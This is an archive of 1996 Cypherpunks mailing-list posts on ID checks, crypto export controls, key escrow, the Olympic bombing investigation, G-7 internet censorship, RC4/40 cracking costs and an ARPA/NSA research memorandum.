he wasn't gonna win this one, so asked me to return to my home and left before
I could respond.  You are right, "Clean and dressed up people are rarely IDed 
[read harassed] on foot."  I'm not concerned for the clean and dressed up
people 
(with regards to police abuse), I'm concerned about the majority of people who 
aren't.  (For the record, I'm generally clean, but *rarely* dressed up. =) )  

>Or flying on a commercial flight.  So far, prosecutions for "failure to
>possess ID" have not succeeded.  You *can* be prosecuted for failure to
>identify yourself (which is *not* the same thing).  The Philadelphia airport
>was allegedly requiring *two* pieces of ID for flights.  If they are talking
>about two pieces of photo -- government-issued ID, I wonder where the 80% of
>Americans without a Passport (x the 90% of Americans who are not government
>employees) get the second piece of ID. [Is it a violation of something if
>you Heil Hitler od Sieg Heil the airline clerk when they ask to see your ID.
>It's not a threat, it's an expression of honor.]

When I flew from Philadelphia about a year ago, they required one picture ID
and one other ID, just like most stores when you want a check cashed.  I still
don't like it, but I have less of a problem presenting ID when I am seeking
a service of some kind.  It is unacceptable to be asked for ID when I am merely
walking around a public street.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 1 Aug 1996 13:20:20 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Let's Say "No!" to Single, World Versions of Software
In-Reply-To: <31FFCD1E.3F54@netscape.com>
Message-ID: <199608010243.WAA28665@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Tom Weinstein writes:

: Mark M. wrote:
: > On Tue, 30 Jul 1996, Tom Weinstein wrote:
: > 
: >> We won't do this.  Our domestic version will always contain the
: >> strongest crypto we can provide.
: > 
: > Then what is the concern about anonymous arms-traffickers uploading
: > the strong crypto version to foreign FTP sites?  I recall you saying
: > that the State Department might revoke Netscape's "permission" to
: > provide a domestic version if it was exported.
: 
: The only thing they can revoke is their permission to provide it for
: download over the internet.  They can't revoke our permission to sell
: it in stores or via snail mail.

Why can't they?  What steps do you take to make sure that the people
you sell it to aren't--gasp--foreign persons?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Thu, 1 Aug 1996 16:27:18 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: Jewell is the Militia Bomber!!!!
Message-ID: <199608010550.WAA19139@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 31 Jul 96 22:40:46 -0800, tcmay@got.net wrote:


>The security guard Jewell is now confirmed to be the prime suspect. While
>NBC News is reporting that no evidence _directly_ links him to the bombing,
>the evidence against him is overwhelming:
>
>1. He is overweight. With the exception of The Unabomber, most perps in
>cases like this are fat.

After all, who could *not* want to conform with crowd?  Anyone who isn't
obsessed with being thin must have something wrong with him.  There ought
to be a law against people like him!

>2. They found a _shotgun_ in his cabin.

Only a criminal would have a reason for that! After, what legitimate use
could a citizen have with one? If he wants to hunt, he should use a
rifle!

>3. He had an interest in guns. (Back issues of "Guns and Ammo" are bad
>enough, but possession of even a single issue of "Combat Handguns" is
>sufficient to convict in 39 of the 50 states.)

Particularly for a cop! Why would anyone in his position need *that*!

>4. News sources are reporting that authorities who searched his apartment
>and his cabin "came up empty," which surely implies that he planned this
>crime with the help of others.

We can take prime examples of this:  The Whitehouse hiring dilemna - if
they can't figure out who hired him, there must be someone in on the job!
 Maybe it's the dead guy. Maybe it's those evil Internet users...

___
Sorry about breaking your sarcasm-meter...
___
>(P.S. I, too, was convinced Jewell was the guy. But in recent hours it is
>looking like a "rush to judgment" could be involved. There is strong
>pressure to "solve the crime" by the close of the Olympics on Sunday.)

I think we could track this to the replacement of literature and culture
with TV - if everyone from T.J. Hooker to Agents Sculley and Mulder solve
a mystery in 30 minutes, surely they can do it in real life, too.

How much do you want to bet that if it is a frame and it is successful,
they'll "find" a PGP encrypted file with plans and use it to promote GAK?

# Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
# Automatically receive my resume or PGPKEY by sending email with a subject
# of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
# Web site: http://www.io-online.com/adamsc/adamsc.htm
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 1 Aug 1996 16:26:41 +0800
To: Martin Minow <risks@csl.sri.com
Subject: Re: "And who shall guard the guardians?"
Message-ID: <199608010551.WAA05766@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:57 PM 7/31/96 -0700, Martin Minow wrote:

>This question is also relevant to escrowed encryption: how to
>prevent misuse of escrowed keys by file clerks and other people
>who need access to the keys as part of their legitimate duties.
>Since these keys will protect a very large amount of money (consider
>the encryption keys used for interbank clearing) and since we
>know from the Aldrich Ames case that $3,000,000 can buy a
>high-ranking CIA employee, there are significant problems that
>need to be addressed. I would suspect that a Baysian analysis
>would indicate that the risk of holding (and losing) a key is
>greater than the risk of not holding (and needing) a key.

 
However, even that is a somewhat skewed analysis.  Most of us realize that 
the  kinds of advanced surveillance systems that are being promoted these 
days have nothing to do with crimes that are, statistically, the most common 
and feared among ordinary citizens. Will a wiretap ever solve a burglary?  
Rarely.  Will a Clipper-type decrypt bring a rapist to justice?  Fairly 
unlikely.  How about a carjacking?  A strong-arm robbery?  An arson?

Sure, it's always possible, but we know what's really going on.  Governments 
are afraid that technology will not only replace the protections we've 
traditionally been told only came from government (and thus make them 
unnecessary), but also that technology will allow us to force those 
governments to shrink and possibly to disband.  

In other words, to a government-type most of the benefits of a Clipper 
system are to the government itself, certainly not to the person who owns 
the phone and not even to society as a whole.  That's one reason, I suspect, 
why those secret talks given to various people to convince them to support 
Clipper "usually" work if the person is a government-type, but will almost 
never work to an unbiased private citizen.  That's also why the lecture is 
secret:  That way, the government can push two different stories without a 
contradiction being obvious to the rest of us.  





Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Thu, 1 Aug 1996 16:35:19 +0800
To: cypherpunks@toad.com
Subject: Re: Jewell is the Militia Bomber!!!!
In-Reply-To: <ae25687f0102100499f1@[205.199.118.202]>
Message-ID: <Pine.GUL.3.95.960731224213.20404G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 31 Jul 1996, Timothy C. May wrote:

> The security guard Jewell is now confirmed to be the prime suspect. While
> NBC News is reporting that no evidence _directly_ links him to the bombing,
> the evidence against him is overwhelming:
> 
> 1. He is overweight. With the exception of The Unabomber, most perps in
> cases like this are fat.

Au contraire:

 Let me have men about me that are fat;
 Sleek-headed men, and such as sleep o' nights:
 Yond Cassius has a lean and hungry look;
 He thinks too much: such men are dangerous.
[...]
        He reads much;
 He is a great observer, and he looks
 Quite through the deeds of men: he loves no plays,
 As thou dost, Antony: he hears no music:
 Seldom he smiles; and smiles in such a sort
 As if he mock'd himself, and scorn'd his spirit
 That could be mov'd to smile at anything.

Which member of the Dream Team does this remind you of?

> (P.S. I, too, was convinced Jewell was the guy. But in recent hours it is
> looking like a "rush to judgment" could be involved. There is strong
> pressure to "solve the crime" by the close of the Olympics on Sunday.)

All I know is:

1. At least one person is dead, and lots more injured.
2. For nothing.

Ferchrissakes, guys, take a step back and look at yourselves. You're playing
the spin control game just as fast and furious as the "bad guys" (?). First
the glee over how easy it was to find bomb-making instructions anywhere,
then saying it was a provocation by the government, now it becomes a
conspiracy against fat people who read gun magazines. 

-rich
 [blue-ribbon disclaimer: it's called sarcasm, son, SARCASM]
 censor the internet! http://www.stanford.edu/~llurch/potw2/
 boycott fadetoblack! http://www.fadetoblack.com/prquest.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 1 Aug 1996 13:47:50 +0800
To: cypherpunks@toad.com
Subject: Re: "An who shall guard the guardians?"
In-Reply-To: <2.2.32.19960731175954.0087e798@panix.com>
Message-ID: <sNoyRD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell <frissell@panix.com> writes:

> At 02:46 AM 8/1/96 -0700, Timothy C. May wrote:
> >
> >The Latin maxim "And who shall guard the guardians?" has some relevance to
> >the headlong rush into converting the U.S. into even more of a security
> >state than it is now.
>
> Quis custodiet ipsos custodes?

Who custodiates the custodians?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 1 Aug 1996 13:33:30 +0800
To: cypherpunks@toad.com
Subject: Re: Photo IDs (Re: A Libertine Question)
In-Reply-To: <ae251a33050210042114@[205.199.118.202]>
Message-ID: <5VoyRD8w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> (As has been commented upon by many analysts, it's likely that the airline
> companies are enforcing the picture I.D. rule so as to stop the practice of
> people buying discount tickets and then selling them to others.
> Specifically, many corporations buy tickets in advance of knowing who the
> actual business traveller will be. The airlines are causing many who arrive
> at the ticket counter to "upgrade" to a full-fare ticket under their real
> name.)

When I fly, my name is _always misspelled in weird ways by the subhumans
who do this sort of work. I'd have problems if "Gimidri Voolens" had to match
some photo id.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 1 Aug 1996 16:32:51 +0800
To: cypherpunks@toad.com
Subject: Cracking RC4/40 for massive wiretapps
Message-ID: <199608010603.XAA19276@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:13 AM 7/30/96 -0700, frantz@netcom.com (Bill Frantz) mused paranoidly:
>I combine the above with Whit Diffie's observation that, while crypto users
>are interested in the security of *each* message, organizations which
>monitor communications want to read *every* message.  A TLA interested in
>monitoring communications would need to crack RC4-40 much faster than
>1/week.

When we discussed using FPGA machines to crack RC4/40 last year,
someone calculated the cost of cracking a message at 8 cents
if you're doing enough to amortize your machine, and Eric had designed
a system that should be able to crack it in about 15 minutes for $25-50K.
The two basic search approaches are to take a cyphertext and decrypt it
trying many keys to see if you get a likely plaintext, or to take known
plaintext and encrypt with many keys to see if you match the cyphertext.

But those designs are for one-at-a-time cracks.  An interesting question
is whether you can speed up performance substantially by cracking
multiple messages at once.  For instance, if you've got known plaintext,
such as a standard header format saying "FooVoice" or "BEGIN DSA-SIGNED..",
you can try many keys and compare them with _many_ cyphertexts,
which may not slow down the FPGA very much.  Also, even for
unknown-plaintext, since key scheduling is a relatively slow part of RC4/40,
you can split the key-schedule and the block-encryption phases, feeding
one keyschedule output to multiple decrypt-and-compare sessions in parallel.
So the cost per victim of cracking many sessions may be much lower.

>Now expensive specialized cracking equipment can certainly speed up the
>process, but there may be a better way.  If cryptanalysis of RC4 yields
>techniques which make the process much easier, then it is the ideal cypher
>to certify for export.
>The paranoid conclusion is that there is a significant weakness in RC4.

Just keeping the key length down to 40 bits on a fast cypher is a good start.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 1 Aug 1996 14:03:45 +0800
To: cypherpunks@toad.com
Subject: "Plague of Freedom" on G-7 from Internet Underground
Message-ID: <v0151011eae25dfc59f36@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain





Date: Wed, 31 Jul 1996 22:35:45 -0500
To: fight-censorship@vorlon.mit.edu
From: declan@well.com (Declan McCullagh)
Subject: "Plague of Freedom" on G-7 from Internet Underground

Yesterday in Paris government ministers from the G-7 countries met and
approved a 25-point plan calling for close cooperation in moving to
"intensify exchange of operational information," particularly "the use
of communications technologies by terrorist groups."

In a HotWired column, Kenneth Cukier writes: "In case there is any
question about the United States's position, Attorney General Janet
Reno said: 'We obtained the agreement of the eight (countries at the
conference) to develop means of lawful government access to and
decoding of scrambled or coded communication transmitted by
terrorists.'" German delegates also blasted the Internet.

The ACLU reports that: "Proposed measures apparently include
investigations of charities and political organizations with radical
political points of view -- threatening their rights to free speech."

I've attached part of a cover story I have in the latest _Internet
Underground_ magazine (http://www.underground-online.com/) that talks
about the G-7 process and how countries around the globe are moving to
stifle the Net. Pick up a copy of the physical mag for the full text of
this article, plus some wonderously horrific graphics including a mouth
shown shut with steel wire.

And for more info, check out my net-censorship archive at:
  http://www.eff.org/~declan/global/

-Declan

-----------------

Internet Underground
August 1996 / Issue 09

"PLAGUE OF FREEDOM"
The Internet's being disinfected for your protection
(pages 28-33)

By Declan McCullagh
declan@well.com


Call it an unlikely parable for today's Internet.

Daniel Defoe's "A Journal of the Plague Years" isn't about cyberspace.
Written in 1665, the book sketches a ghastly picture of a London under
seige.

Defoe tells how rats from foreign ships have invaded the city, carrying
with them the bubonic plague. Authorities resort to desperate measures,
barricading families inside their homes in a desperate attempt to halt
the onslaught.

It doesn't work. "Setting watchmen thus to keep the people in was,
first of all, not effectual, but that the people broke out, whether by
force or by strategm, even almost as often as they pleased," Defoe
wrote.

So it is with the sprawling expanse of cyberspace in 1996. Governments
around the globe are rushing to barricade their borders, dam the flow
of foreign data, and create a new world information order. For good
reason: an uncensored 'net connection can be as deadly to a 20th
century government as the plague was three centuries ago.

And it may be just as infectious.

[...]

INTERNATIONAL ORGANIZATIONS

The most influential international body involved in cyberrulemaking is
the G-7 group of industrialized nations. Truth be told, it's obscure
outside financial circles and is seen even inside them as becoming
irrelevant in a global financial system dominated by multinational
corporations, not by governments.

Yet the seven member nations have already started using the G-7
umbrella to engage in a sort of joint head-scratching about what to do
with cyberspace.

It started in February 1995 in Brussels, at a meeting called the "G-7
Ministerial Conference on the Information Society." There the telecom
honchos from G-7 nations and several smaller countries gathered to chat
about online copyright, cultural pollution, universal access, free
speech, and encryption policies.

At least the principles were lofty. "While the rhetoric of the
conference was progressive, there was no serious discussion of free
expression or other human rights concerns," wrote one American who
attended the conference.

Instead, the G-7 nations said they were considering how to deal with
inappropriate material on the 'net. Canada reminded the other countries
that it wasn't as permissive as the U.S. in dealing with
"hate-mongering materials," saying that when such publications appear
online "they are much easier to obtain but are more difficult to
monitor and take action against." The European Union decried copyright
pirates: "Some form of international cooperation is necessary to
supplement the existing legal systems governing intellectual property
rights." Saying the 'net is "not without risks," France stressed that
cyberspace "must not result in a standardization in content, or a
leveling of cultures."

Only Vice President Al Gore tossed a bone to cyber-rights advocates.
"[Cyberspace] is about protecting and enlarging freedom of expression
for all our citizens... Ideas should not be checked at the border,"
said Gore.

Gore didn't do this in a vacuum. "Our big victory at Brussels was that
we pressured them enough so that Al Gore in his keynote address made a
big point of stressing the importance of free speech on the Internet,"
says Ann Beeson of the American Civil Liberties Union.

Beeson should know -- she's been one of the few cybersavvy activists
who has been fighting globally for an unshackled Internet. Now a
principal attorney on the ACLU's legal team challenging the
Communications Decency Act, Beeson previously worked at Human Rights
Watch and crafted a letter the group sent to Gore before the Brussels
conference. Citing Article 19 of the Universal Declaration of Human
Rights, it said: "Everyone has the right... to seek, receive and impart
information and ideas through any media and regardless of frontiers.

Unfortunately, the only G-7 voices supporting this today are a silent
chorus.

The G-7 information ministers met again in South Africa in May 1996 and
plan to meet in Egypt later this year, but no international
'net-advocacy group has been tracking the proposals discussed at the
meetings. U.S. cyberliberty groups have been preoccupied with the CDA
battle, and they have no international counterparts.

That's finally about to change. Two global 'net-alliances are emerging
and have held their initial planning meetings at Internet conferences
this summer in Canada.

The ACLU co-founded one group, called the Global Internet Liberty
Campaign. "We have to face the fact that while ultimately it's
extraordinarily difficult for governments to control the 'net, they're
going to try," says Barry Steinhardt, associate director of the ACLU.
"The best thing that governments can do is to stay out if it."

Not so, says Bruce Taylor, the chief architect of the CDA and a
professional cyber-scaremonger. The former Federal porn-prosecutor
believes that "not all censorship is bad."

"Foreign countries have an obligation to restrict obscenity and child
pornography on the Internet by the treaty of 1911," says Taylor. "It's
an agreement between the states to cooperate and to use international
laws to prosecute obscenity." And to Taylor, books and copies of
Penthouse magazine can be obscene.

FUTURE REGULATIONS

David Post is a likeable, bearded fellow who once studied yellow
babboons in Kenya and wears tennis shoes with his suits. Now the
co-director of the Cyberspace Law Institute, Post is one of the
few lawyers who's made a serious study of the international
evolution of the 'net.

To Post, the 'net is at a fork in its development: the two paths are
self-regulation or an international government crackdown.

"It's the central problem the 'net faces today," says Post. "How does
it relieve itself of the conflicting claims of soverigns whose power is
based on geographical boundaries -- something the 'net doesn't
recognize?"

Eric Freedman, a constitutional law professor at Hofstra Law School, is
anything but optimistic. Freedman remembers how governments already
have crafted a complex constellation of little-known treaties and
agreements governing everything from satellite placement to the world
banking system and postal services.

"I'm worried that the governments are ahead of us," says Freedman.
"There's a humongous potential to get absolutely screwed here... If 100
countries agreed on this, they could get this done in a week. It's
easier for them to coordinate, agree, and implement than it is for us
to stop them from doing so."

That's why the ACLU/American Library Association lawsuit challenging
the CDA is vital. If the Supreme Court upholds the law, Congress and
the White House can craft international "decency" agreements for
cyberspace. But if the high court slams the law as unconstitutional,
Clinton would be barred from signing a CDA-type treaty. "It's a
principle of constitutional law that any treaty has to conform to the
Constitution," says Freedman.

A victory in the CDA case would, in a sense, turn the U.S. into a safe
haven for controversial content from all over the world.

Freedman urges 'netizens in every country to launch similar fights
against government 'net-censorship. "Win as many national victories as
possible to get ahead of the governments of the world," he says. "If
the German or Australian supreme courts were to rule that freedom of
speech principles apply to the 'net as they do to a newspaper, that
would be very helpful."

In the near future, that's the best way to forestall the world
information order. The first time a country proposes such a formal
treaty, it has to die from lack of support.

But pressure to regulate the 'net will always exist, and a new way of
looking at cyberspace may have to emerge. Some precedents exist.
Maritime law, for example, says that no single nation has jurisdiction
over the oceans. Medieval Europe recognized a separate law for
merchants that had its own judicial system. Antarctica is not governed
by any single country's laws. The Catholic Church is a multinational
institution that largely rules itself.

The Cyberspace Law Institute's Post argues for this model. "We should
treat cyberspace as a distinct location and allow our own distinct
legal and moral systems to evolve," he says.

He's right. As the 'net matures, no other solution will work.

Daniel Defoe described governments locking citizen inside their homes,
to no avail: "It was impossible for one man so to guard all the
passages as to prevent the escape of people made desperate... And that
which was still worse, those that did thus break out spread the
infection farther."

The infection cyberspace spreads today is far more virulent than the
bubonic plague. Anathema to government, the 'net carries the virus of
freedom.

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 1 Aug 1996 15:37:18 +0800
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: "An who shall guard the guardians?"
In-Reply-To: <199608010119.UAA24361@manifold.algebra.com>
Message-ID: <Pine.LNX.3.93.960731232510.341C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 31 Jul 1996, Igor Chudov @ home wrote:
> Timothy C. May wrote:
> > ObClipper: "Who shall guard the guardians?" While the various Clipper
> > proposals have putative safeguards to limit access, think of Craig
> > Livingstone, a rent-a-cop the Clintons hire to work on their Enemies List.
> > And think of the dossiers of J. Edgar Hoover. And think of Nixon. And think
> > of what President Pat Buchanan would do with Government Access to Keys.
> What President Pat Buchanan would do with Government Access to Keys, I 
> wonder? (seriously)

     Probably the same as Herr Clinton.
  
Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Aug 1996 17:11:26 +0800
To: cypherpunks@toad.com
Subject: Re: Jewell is the Militia Bomber!!!!
Message-ID: <ae25a290040210043ec2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:53 AM 8/1/96, Rich Graves wrote:

>Ferchrissakes, guys, take a step back and look at yourselves. You're playing
>the spin control game just as fast and furious as the "bad guys" (?). First
>the glee over how easy it was to find bomb-making instructions anywhere,
>then saying it was a provocation by the government, now it becomes a
                                                     ^^^^^^^^^^^^^^^^
>conspiracy against fat people who read gun magazines.
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Rich, maybe you're spending too much time amongst the Zundelsite Neo-Nazis.
You no longer recognize humor even when it's pretty damned obvious.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@aa.net>
Date: Sun, 18 Aug 1996 09:53:34 +0800
To: Derek Bell <dbell@maths.tcd.ie>
Subject: Re: Orbiting Datahavens
In-Reply-To: <9608171851.aa04986@salmon.maths.tcd.ie>
Message-ID: <Pine.LNX.3.95.960702170220.402A-100000@opus.islet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 17 Aug 1996, Derek Bell wrote:

> 	Wouldn't you have to use military-grade chips for the hardware? (Or
> whatever the type is - it had better survive launch, not to mention solar
> flares.)

  You'd have to make sure everything was soldered in pretty well, but it
could be done. As for solar flare, etc. protection it won't need anything
that any other satellite system would need.

> >  If the HAM radio community can get a satellite into space, why not the
> >Cypherpunks/Linux communities?
> 
> 	Wow - I've been out of touch with space programmes in the last few
> years - which satellite was this? (The HAM radio one?)

  Embarrasingly enough, I cannot remember its name. I don't have a HAM
license (although I've studied for it -- just never took the test), but my
boss does. I think the satellite was launched in the mid to late 80's, and
it used for experimental communications.

> 
> 	Anyone have any reccomendations for good web sites on
> satellites/rockets/space science in general?

  Good idea, I'll start a link on my webpage :>

> 	I'm not sure who would launch it - a Japanese launcher? (ESA is
> strapped for cash, which was one reason for the phenomenaly stupid move of
> putting space probes onto the maiden flight of the Ariane 5.)

  We'd want someone more reliable than ESA! I doubt that we could afford
to have a backup satellite in case of a disaster. Once the Delta Clipper
is functional the payload costs to orbit is supposed to drop tremendously.

   Brian






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jack <thecrow@iconn.net>
Date: Mon, 23 Sep 1996 06:18:44 +0800
To: coderpunks@toad.com
Subject: Evolving algorithm for faster brute force key searches?
Message-ID: <31DD74B1.BB3@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain


I got an idea last night, maybe this has already been thought of and
tried, but I thought I would give a quick outline of the program I was
thinking of:

-Specify a maximum key size (assume 1024bits or something)
-Start with an arbitrary key "aaaaaaaaaaaaaa"

Start a loop

-create five mutations of the key
-use each key to try and decrypt a few bytes of the message
-run a (or some) statistical analysis tests and come up with a value
for how 'random' the decrypted bits are
-Pick the key that produced the least random ouput

Repeat


Probably this wouldnt work on any very strong algorithm, but it seems it
might be effective against some.  I am going to write the code and try
it out on RC4 and on a weakling little algorithm I wrote a while back.
Let me know what yall think.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 1 Aug 1996 18:12:07 +0800
To: cypherpunks@toad.com
Subject: Re: Smart cards "a giant leap backwards" - Canadian Privacy	  Commissioner
Message-ID: <v02120d07ae25fd16b3a4@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:12 7/31/96, Duncan Frissell wrote:
>At 02:23 PM 7/30/96 -0400, Richard Martin wrote:
>>Very little that might be new or enlightening to the world; attendees
>>of CFP '96 will remember [fuzzily, in my case] the closest thing to
>>Bruce's counterpart in the states admitting that the USA doesn't actually
>>have much of a counterpart to the privacy commissioner.
>
>Most Central European countries have both privacy commissioners and legal
>requirements that everyone register their addresses with the police.  I'll
>do without the former if I can also avoid the latter.

I remember a time when Privacy Commissioners were a new thing. Their
primary purpose seemed to be to sanction government access to (and keeping
of) large databases on the activities of the population. Their secondary
purpose was to prevent the private sector competition from doing the same.
Eliminating access to such data by the individual in the process.

Things may have changed for the better, but I doubt it.


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 1 Aug 1996 17:50:11 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: A Libertine Question
Message-ID: <v02120d08ae25ff4436d1@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:12 7/31/96, Duncan Frissell wrote:

>Most demands for ID and conformations with police involve the operation of
>motor vehicles.  I have never been "IDed" except at border crossings and
>when I was operating motor vehicles.  Clean and dressed up people are rarely
>IDed on foot.  Maybe you should mention some of the specific practices in
>Seattle that disturb you.

I have been IDed numerous times for no other reason than walking on the
sidewalk at a late hour in an area where most people use cars to go to the
7/11 down the block. Southern California is especially bad in this regard.
A friend, who had the same problem, finally got a dog. After that the cops
left her alone. Seems walking your dog is a legitimate reason to be out at
night...



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 1 Aug 1996 17:53:11 +0800
To: David Rosoff <cypherpunks@toad.com
Subject: Re: Violation or Protection? [OLYMPICS]
Message-ID: <v02120d09ae26039239a3@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:03 7/31/96, David Rosoff wrote:
[...]
>On the local news I saw footage of a couple schmoozing in the Olympic
>(Centennial?) Park after its reopening. The voice-over said that all
>bags are being searched, and the couple said that rather than be
>alarmed or nervous, they "appreciated" it.
>
>I'm not quite sure what to think about this. I don't have enough
>experience to form a well thought-out opinion. I'd like to hear some
>of everyone's thoughts on this: Is this bag-searching a violation,
>(which was my immediate reaction) or is it not, because you have to
>already be going into the controlled area to get searched?

You are confused because you wonder how it could be that the couple could
appreciate having their bags searched, something you intuitively regard as
a violation of their rights. The very simple answer is that, generally
speaking, individuals enjoy to have their rights violated, provided that
they are given a (often false) sense of security in return.

Surveys from a few years ago showed that a majority of Americans would
approve of warrantless house-to-house searches, including their own, to
combat the use of narcotics.

ObCrypto:
The public will cheer the day that strong, non-escowed crypto is outlawed.


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 1 Aug 1996 16:28:42 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: A Libertine Question
In-Reply-To: <2.2.32.19960731151242.0087632c@panix.com>
Message-ID: <Pine.SV4.3.91.960801015212.23502D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 31 Jul 1996, Duncan Frissell wrote:

> You *can* be prosecuted for failure to
> identify yourself 

   Only if you were already under arrest. Arrestees have a duty to 
identify themselves when asked.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 1 Aug 1996 19:58:03 +0800
To: cypherpunks@toad.com
Subject: NSA/ARPA/DISA joint research office Memo of Agreement
Message-ID: <199608010857.BAA21140@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[I found this at the ARPA web site while looking up the programs there
that are trying to deploy crypto in the Internet.  You can read it as
plain text, the HTML crud peters out after the first page.  If you
look at it on the web, they have reproduced the signatures from the
signature page in a GIF file.  -- John]

<BASE HREF="http://www.ito.darpa.mil/ResearchAreas/Information_Survivability/MOA.html">

<HTML>
<HEAD>
<TITLE>MOA - Information Systems Security Research Joint Technology
Office</TITLE>
</HEAD>
<BODY>
 


<CENTER>
<H3>Memorandum of Agreement<BR>
Between<BR>
The Advanced Research Projects Agency,<BR>
The Defense Information Systems Agency, and<BR>
The National Security Agency<BR>Concerning<BR>
The Information Systems Security Reseach Joint Technology Office</H3>
</CENTER>

<H3>Purpose</H3>

The Advanced Research Projects Agency (ARPA), the Defense Information
Systems Agency (DISA), and the National Security Agency (NSA) agree to
the establishment of the Information  System Security Research Joint
Technology Office (ISSR-JTO) as a joint activity.  The ISSR-JTO is
being established to coordinate the information systems security
research programs of ARPA and NSA.  The ISSR-JTO will work to optimize
use of the limited research funds available, and strengthen the
responsiveness of the programs to DISA, expediting delivery of
technologies that meet DISA's requirements to safeguard the
confidentiality, integrity, authenticity, and availability of data in
Department of Defense information systems, provide a robust first line
of defense for defensive information warfare, and permit electronic
commerce between the Department of Defense and its contractors.

<H3>Background</H3>

In recent years, exponential growth in government and private sector
use of networked systems to  produce and communicate information has
given rise to a shared interest by NSA and ARPA  in focusing
government R&D on information systems security  technologies.  NSA and
its primary network security customer, DISA, have become increasingly
reliant upon commercial information technologies and services to build
the Defense Information Infrastructure, and the inherent security of
these technologies and services has become a vital concern.  From
ARPA'S perspective, it has become increasingly apparent that security
is critical to the success of key ARPA information technology
